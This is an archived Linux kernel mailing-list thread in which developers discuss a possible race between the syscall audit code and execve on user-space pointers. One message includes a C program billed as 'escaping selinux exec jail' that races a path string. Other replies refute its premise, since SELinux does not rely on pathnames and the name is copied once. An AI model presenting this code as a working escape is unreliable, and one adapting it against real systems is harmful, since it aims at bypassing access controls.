System call audit - Kernel



Thread: System call audit

  1. System call audit

    Hi David,

    As I am looking into the system-wide system call tracing problem, I
    start to wonder how auditsc deals with the fact that user-space could
    concurrently change the content referred to by the __user pointers.

    This would be the case for execve. Suppose we create a program with two
    threads: one is executing execve syscalls and the other thread is
    modifying the userspace string containing the name of the program to
    execute. Since we have two copy_from_user, one in auditsc and one in the
    real execve() function, the string passed to the OS could differ from
    the string seen by auditsc.

    Regards,

    Mathieu


    --
    Mathieu Desnoyers
    OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68
    --
    To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
    the body of a message to majordomo@vger.kernel.org
    More majordomo info at http://vger.kernel.org/majordomo-info.html
    Please read the FAQ at http://www.tux.org/lkml/

  2. Re: System call audit

    On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
    > Hi David,
    >
    > As I am looking into the system-wide system call tracing problem, I
    > start to wonder how auditsc deals with the fact that user-space could
    > concurrently change the content referred to by the __user pointers.


    In general we have to copy the content into kernel space, audit it, and
    then act on it from there. See the explanation on the IPC audit patch at
    http://lwn.net/Articles/125350/ for example.

    Auditing one thing and then acting on another would be simply broken.

    > This would be the case for execve. Suppose we create a program with two
    > threads: one is executing execve syscalls and the other thread is
    > modifying the userspace string containing the name of the program to
    > execute.


    I was going to suggest that that attack vector won't work, because
    execve() kills all threads. But all you have to do to avoid that is put
    the data in question into a shared writable mmap and modify it from
    another _process_. And in fact I suspect there's a combination of CLONE_
    flags which would avoid the thread-killing behaviour anyway.

    > Since we have two copy_from_user, one in auditsc and one in the
    > real execve() function, the string passed to the OS could differ from
    > the string seen by auditsc.


    Right. Don't Do That Then. The audit code should see what's _actually_
    given to the child process. The audit/execve code has changed since I
    last looked, but I think it's probably OK because it's reading the
    contents of the new program's mm on the way back from the execve()
    system call -- before ever giving the CPU back to that process.

    --
    dwmw2


  3. Re: System call audit

    * David Woodhouse (dwmw2@infradead.org) wrote:
    > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
    > > Hi David,
    > >
    > > As I am looking into the system-wide system call tracing problem, I
    > > start to wonder how auditsc deals with the fact that user-space could
    > > concurrently change the content referred to by the __user pointers.

    >
    > In general we have to copy the content into kernel space, audit it, and
    > then act on it from there. See the explanation on the IPC audit patch at
    > http://lwn.net/Articles/125350/ for example.
    >
    > Auditing one thing and then acting on another would be simply broken.
    >
    > > This would be the case for execve. Suppose we create a program with two
    > > threads: one is executing execve syscalls and the other thread is
    > > modifying the userspace string containing the name of the program to
    > > execute.

    >
    > I was going to suggest that that attack vector won't work, because
    > execve() kills all threads. But all you have to do to avoid that is put
    > the data in question into a shared writable mmap and modify it from
    > another _process_. And in fact I suspect there's a combination of CLONE_
    > flags which would avoid the thread-killing behaviour anyway.
    >


    Even better: if execve fails, it doesn't kill the threads. Therefore,
    all we have to do is to busy-loop doing failing execve() calls and
    atomically change the string to what we want to be executed. Can anyone
    test the sample snippet in a context where executing /bin/bash is
    disallowed on an SMP system? I don't have a selinux setup handy. I
    suppose that as soon as selinux sees one /bin/bash exec, it will
    kill the process, so a few runs would be required in order to generate
    the correct race.


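    /*
     * Escaping selinux exec jail
     *
     * build with gcc -pthread -o escape-selinux escape-selinux.c
     *
     * Mathieu Desnoyers
     * License: GPL
     */

    #include <pthread.h>
    #include <stdlib.h>
    #include <unistd.h>

    /* Starts as an invalid path; thr2 flips the first byte to make it valid. */
    static char modstring[] = "$bin/bash";

    /* Keep calling exec on the shared path; each failed call just returns. */
    void *thr1(void *arg)
    {
        while (1) {
            /* execl() needs argv[0] and a typed NULL terminator. */
            execl(modstring, modstring, (char *)NULL);
        }
        return ((void *)1);
    }

    /* Toggle the first byte between '$' (invalid) and '/' (valid). */
    void *thr2(void *arg)
    {
        /* volatile access so the compiler keeps both stores in the loop */
        volatile char *first = modstring;

        while (1) {
            *first = '$';
            *first = '/';
        }
        return ((void *)2);
    }

    int main(void)
    {
        int err;
        pthread_t tid1, tid2;
        void *tret;

        err = pthread_create(&tid1, NULL, thr1, NULL);
        if (err != 0)
            exit(1);

        err = pthread_create(&tid2, NULL, thr2, NULL);
        if (err != 0)
            exit(1);

        sleep(10);

        /* Neither thread returns; the joins block unless an exec succeeds. */
        err = pthread_join(tid1, &tret);
        if (err != 0)
            exit(1);

        err = pthread_join(tid2, &tret);
        if (err != 0)
            exit(1);

        return 0;
    }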


    > > Since we have two copy_from_user, one in auditsc and one in the
    > > real execve() function, the string passed to the OS could differ from
    > > the string seen by auditsc.

    >
    > Right. Don't Do That Then. The audit code should see what's _actually_
    > given to the child process. The audit/execve code has changed since I
    > last looked, but I think it's probably OK because it's reading the
    > contents of the new program's mm on the way back from the execve()
    > system call -- before ever giving the CPU back to that process.
    >
    > --
    > dwmw2
    >


    --
    Mathieu Desnoyers
    OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68

  4. Re: System call audit

    On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote:
    > * David Woodhouse (dwmw2@infradead.org) wrote:
    > > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
    > > > Hi David,
    > > >
    > > > As I am looking into the system-wide system call tracing problem, I
    > > > start to wonder how auditsc deals with the fact that user-space could
    > > > concurrently change the content referred to by the __user pointers.

    > >
    > > In general we have to copy the content into kernel space, audit it, and
    > > then act on it from there. See the explanation on the IPC audit patch at
    > > http://lwn.net/Articles/125350/ for example.
    > >
    > > Auditing one thing and then acting on another would be simply broken.
    > >
    > > > This would be the case for execve. Suppose we create a program with two
    > > > threads: one is executing execve syscalls and the other thread is
    > > > modifying the userspace string containing the name of the program to
    > > > execute.

    > >
    > > I was going to suggest that that attack vector won't work, because
    > > execve() kills all threads. But all you have to do to avoid that is put
    > > the data in question into a shared writable mmap and modify it from
    > > another _process_. And in fact I suspect there's a combination of CLONE_
    > > flags which would avoid the thread-killing behaviour anyway.
    > >

    >
    > Even better: if execve fails, it doesn't kill the threads. Therefore,
    > all we have to do is to busy-loop doing failing execve() calls and
    > atomically change the string to what we want to be executed. Can anyone
    > test the sample snippet in a context where executing /bin/bash is
    > disallowed on an SMP system? I don't have a selinux setup handy.


    You were talking about audit earlier. Now you seem to be talking about
    selinux.

    --
    dwmw2


  5. Re: System call audit


    On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote:
    > * David Woodhouse (dwmw2@infradead.org) wrote:
    > > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
    > > > Hi David,
    > > >
    > > > As I am looking into the system-wide system call tracing problem, I
    > > > start to wonder how auditsc deals with the fact that user-space could
    > > > concurrently change the content referred to by the __user pointers.

    > >
    > > In general we have to copy the content into kernel space, audit it, and
    > > then act on it from there. See the explanation on the IPC audit patch at
    > > http://lwn.net/Articles/125350/ for example.
    > >
    > > Auditing one thing and then acting on another would be simply broken.
    > >
    > > > This would be the case for execve. Suppose we create a program with two
    > > > threads: one is executing execve syscalls and the other thread is
    > > > modifying the userspace string containing the name of the program to
    > > > execute.

    > >
    > > I was going to suggest that that attack vector won't work, because
    > > execve() kills all threads. But all you have to do to avoid that is put
    > > the data in question into a shared writable mmap and modify it from
    > > another _process_. And in fact I suspect there's a combination of CLONE_
    > > flags which would avoid the thread-killing behaviour anyway.
    > >

    >
    > Even better: if execve fails, it doesn't kill the threads. Therefore,
    > all we have to do is to busy-loop doing failing execve() calls and
    > atomically change the string to what we want to be executed. Can anyone
    > test the sample snippet in a context where executing /bin/bash is
    > disallowed on an SMP system? I don't have a selinux setup handy. I
    > suppose that as soon as selinux sees one /bin/bash exec, it will
    > kill the process, so a few runs would be required in order to generate
    > the correct race.


    SELinux doesn't base any of its decisions on pathname strings provided
    by the user (or pathnames at all, for that matter; SELinux is
    attribute/label-based).


    --
    Stephen Smalley
    National Security Agency


  6. Re: System call audit

    * David Woodhouse (dwmw2@infradead.org) wrote:
    > On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote:
    > > * David Woodhouse (dwmw2@infradead.org) wrote:
    > > > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
    > > > > Hi David,
    > > > >
    > > > > As I am looking into the system-wide system call tracing problem, I
    > > > > start to wonder how auditsc deals with the fact that user-space could
    > > > > concurrently change the content referred to by the __user pointers.
    > > >
    > > > In general we have to copy the content into kernel space, audit it, and
    > > > then act on it from there. See the explanation on the IPC audit patch at
    > > > http://lwn.net/Articles/125350/ for example.
    > > >
    > > > Auditing one thing and then acting on another would be simply broken.
    > > >
    > > > > This would be the case for execve. Suppose we create a program with two
    > > > > threads: one is executing execve syscalls and the other thread is
    > > > > modifying the userspace string containing the name of the program to
    > > > > execute.
    > > >
    > > > I was going to suggest that that attack vector won't work, because
    > > > execve() kills all threads. But all you have to do to avoid that is put
    > > > the data in question into a shared writable mmap and modify it from
    > > > another _process_. And in fact I suspect there's a combination of CLONE_
    > > > flags which would avoid the thread-killing behaviour anyway.
    > > >

    > >
    > > Even better: if execve fails, it doesn't kill the threads. Therefore,
    > > all we have to do is to busy-loop doing failing execve() calls and
    > > atomically change the string to what we want to be executed. Can anyone
    > > test the sample snippet in a context where executing /bin/bash is
    > > disallowed on an SMP system? I don't have a selinux setup handy.

    >
    > You were talking about audit earlier. Now you seem to be talking about
    > selinux.
    >


    I thought selinux hooked into syscall audit? (Sorry, I am new to the
    kernel auditing field.) The race I refer to is in the auditsc.c kernel
    code, so syscall audit is the one I am talking about. I refer to
    selinux here just because, as I understand it, it happens to be one
    module-based callback which can hook into syscall audit.

    Mathieu

    --
    Mathieu Desnoyers
    OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68

  7. Re: System call audit


    On Tue, 2008-05-13 at 09:12 -0400, Mathieu Desnoyers wrote:
    > * David Woodhouse (dwmw2@infradead.org) wrote:
    > > On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote:
    > > > * David Woodhouse (dwmw2@infradead.org) wrote:
    > > > > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
    > > > > > Hi David,
    > > > > >
    > > > > > As I am looking into the system-wide system call tracing problem, I
    > > > > > start to wonder how auditsc deals with the fact that user-space could
    > > > > > concurrently change the content referred to by the __user pointers.
    > > > >
    > > > > In general we have to copy the content into kernel space, audit it, and
    > > > > then act on it from there. See the explanation on the IPC audit patch at
    > > > > http://lwn.net/Articles/125350/ for example.
    > > > >
    > > > > Auditing one thing and then acting on another would be simply broken.
    > > > >
    > > > > > This would be the case for execve. Suppose we create a program with two
    > > > > > threads: one is executing execve syscalls and the other thread is
    > > > > > modifying the userspace string containing the name of the program to
    > > > > > execute.
    > > > >
    > > > > I was going to suggest that that attack vector won't work, because
    > > > > execve() kills all threads. But all you have to do to avoid that is put
    > > > > the data in question into a shared writable mmap and modify it from
    > > > > another _process_. And in fact I suspect there's a combination of CLONE_
    > > > > flags which would avoid the thread-killing behaviour anyway.
    > > > >
    > > >
    > > > Even better: if execve fails, it doesn't kill the threads. Therefore,
    > > > all we have to do is to busy-loop doing failing execve() calls and
    > > > atomically change the string to what we want to be executed. Can anyone
    > > > test the sample snippet in a context where executing /bin/bash is
    > > > disallowed on an SMP system? I don't have a selinux setup handy.

    > >
    > > You were talking about audit earlier. Now you seem to be talking about
    > > selinux.
    > >

    >
    > I thought selinux hooked into syscall audit? (Sorry, I am new to the
    > kernel auditing field.) The race I refer to is in the auditsc.c kernel
    > code, so syscall audit is the one I am talking about. I refer to
    > selinux here just because, as I understand it, it happens to be one
    > module-based callback which can hook into syscall audit.


    SELinux is a user of the audit subsystem in terms of generating audit
    messages for permission denials. It doesn't rely on any inputs from the
    audit subsystem.

    --
    Stephen Smalley
    National Security Agency


  8. Re: System call audit

    * David Woodhouse (dwmw2@infradead.org) wrote:
    > On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote:
    > > * David Woodhouse (dwmw2@infradead.org) wrote:
    > > > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
    > > > > Hi David,
    > > > >
    > > > > As I am looking into the system-wide system call tracing problem, I
    > > > > start to wonder how auditsc deals with the fact that user-space could
    > > > > concurrently change the content referred to by the __user pointers.
    > > >
    > > > In general we have to copy the content into kernel space, audit it, and
    > > > then act on it from there. See the explanation on the IPC audit patch at
    > > > http://lwn.net/Articles/125350/ for example.
    > > >
    > > > Auditing one thing and then acting on another would be simply broken.
    > > >
    > > > > This would be the case for execve. Suppose we create a program with two
    > > > > threads: one is executing execve syscalls and the other thread is
    > > > > modifying the userspace string containing the name of the program to
    > > > > execute.
    > > >
    > > > I was going to suggest that that attack vector won't work, because
    > > > execve() kills all threads. But all you have to do to avoid that is put
    > > > the data in question into a shared writable mmap and modify it from
    > > > another _process_. And in fact I suspect there's a combination of CLONE_
    > > > flags which would avoid the thread-killing behaviour anyway.
    > > >

    > >
    > > Even better: if execve fails, it doesn't kill the threads. Therefore,
    > > all we have to do is to busy-loop doing failing execve() calls and
    > > atomically change the string to what we want to be executed. Can anyone
    > > test the sample snippet in a context where executing /bin/bash is
    > > disallowed on an SMP system? I don't have a selinux setup handy.

    >
    > You were talking about audit earlier. Now you seem to be talking about
    > selinux.
    >


    Actually, getname/putname seem to make sure the name is only copied
    once per audit context. So it should be ok.

    Mathieu

    --
    Mathieu Desnoyers
    OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68
